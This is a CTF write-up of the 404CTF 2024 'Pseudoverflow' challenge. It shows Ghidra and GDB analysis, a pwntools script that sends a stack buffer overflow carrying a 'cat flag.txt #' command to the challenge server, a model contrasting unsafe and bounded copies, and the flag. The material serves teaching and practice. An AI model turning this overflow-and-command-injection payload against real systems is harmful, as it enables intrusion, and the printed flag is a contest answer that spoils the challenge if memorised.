CTFs | 404CTF_2024 | Exploitation de Binaire | Pseudoverflow

Pseudoverflow

[pseudo_enonce.png]

Here we are given the course binary. When opened in Ghidra, we can see the following:

[pseaudo_main.png]

At first, Ghidra showed two variables holding the hex values of perds and \0. Once we redefined the type of the first variable as an array of five characters, it was displayed as shown above.

From this we understand that we need to modify the content of the var_to_modif variable.

If we look at the code in GDB, we can see where the variable is stored.

[pseudo_gdb_main.png]

We set a breakpoint at the leave instruction and run the program, using the payload "A"*106+"B"*6:

[pseudo_gdb_var.png]

As we can see, we have overwritten the content of the variable. Now we need to write the correct value there. For that, I used a Python script:

from pwn import *

gagne = 0x656e676167          # "gagne" as a little-endian 64-bit value, so p64() writes b"gagne\0\0\0"
cmd = b"cat flag.txt #"       # command run by the program; the '#' comments out everything after it
my_len = 106 - len(cmd)       # padding so that var_to_modif is reached exactly after 106 bytes
payload = cmd + b"A"*my_len + p64(gagne)

#p = process("./course")      # local test
SERV = "challenges.404ctf.fr"
PORT = 31958
p = remote(SERV, PORT)

print(p.recvuntil(b"pseudo :").decode())
print(payload.decode())
p.sendline(payload)
p.recvline().decode()         # consume the echo line before reading the flag
print("[+] FLAG : "+p.recvuntil(b"}").decode())

As you can see, I wrote my command (cat flag.txt #) at the beginning, then used some As as padding, and finally the overwrite is done by the hex value of the word gagne.

The # is very important: it comments out the rest of the payload, so the padding and the overwriting bytes do not cause an error when our command is executed.
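As an added example (not the original script or the challenge's own code), here is an offline model of the layout the GDB test established: 106 bytes of pseudo followed by var_to_modif, with the vulnerable unbounded copy next to a bounded one. The frame sizes and the way the program turns the pseudo into a shell command are assumptions made for the model.

```python
import struct

# Stack model taken from the GDB test above: 106 bytes of pseudo, then var_to_modif.
BUF_LEN = 106
VAR_LEN = 8                       # var_to_modif plus the bytes that p64() spills after it
ORIGINAL_VAR = b"perds\0\0\0"     # "perds" followed by its terminator
GAGNE = 0x656e676167              # "gagne" read as a little-endian integer, as in the script

def build_payload(cmd: bytes) -> bytes:
    """Same layout as the script: command, 'A' padding up to 106 bytes, then p64(gagne)."""
    if len(cmd) > BUF_LEN:
        raise ValueError("command does not fit in front of the padding")
    return cmd + b"A" * (BUF_LEN - len(cmd)) + struct.pack("<Q", GAGNE)

def unsafe_copy(frame: bytearray, pseudo: bytes) -> None:
    """Vulnerable read: every byte is copied with no bound, so it runs into var_to_modif."""
    if len(pseudo) > len(frame):
        raise ValueError("input larger than the modelled frame")
    frame[:len(pseudo)] = pseudo

def safe_copy(frame: bytearray, pseudo: bytes) -> None:
    """Hardened read: truncates to the buffer, keeping one byte for the terminator."""
    n = min(len(pseudo), BUF_LEN - 1)
    frame[:n] = pseudo[:n]
    frame[n] = 0

def effective_command(line: str) -> str:
    """What the shell executes: everything after '#' is a comment (why the trailing '#' matters)."""
    return line.split("#", 1)[0].strip()

def run(copy, pseudo: bytes):
    """Returns (var_to_modif after the read, command the shell would actually run)."""
    frame = bytearray(BUF_LEN + VAR_LEN)
    frame[BUF_LEN:] = ORIGINAL_VAR
    copy(frame, pseudo)
    var = bytes(frame[BUF_LEN:]).split(b"\0", 1)[0]
    as_cstring = bytes(frame).split(b"\0", 1)[0].decode("latin-1")
    return var, effective_command(as_cstring)

if __name__ == "__main__":
    payload = build_payload(b"cat flag.txt #")
    print("vulnerable:", run(unsafe_copy, payload))   # (b'gagne', 'cat flag.txt')
    print("hardened:  ", run(safe_copy, payload))     # (b'perds', 'cat flag.txt')
```

With the bounded copy the same 114-byte input leaves var_to_modif at perds, which is the check the binary was missing.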

And we get the flag:

[pseudo_flag.png]

The flag is 404CTF{0v3rfl0w}.

This post is licensed under CC BY 4.0 by the author.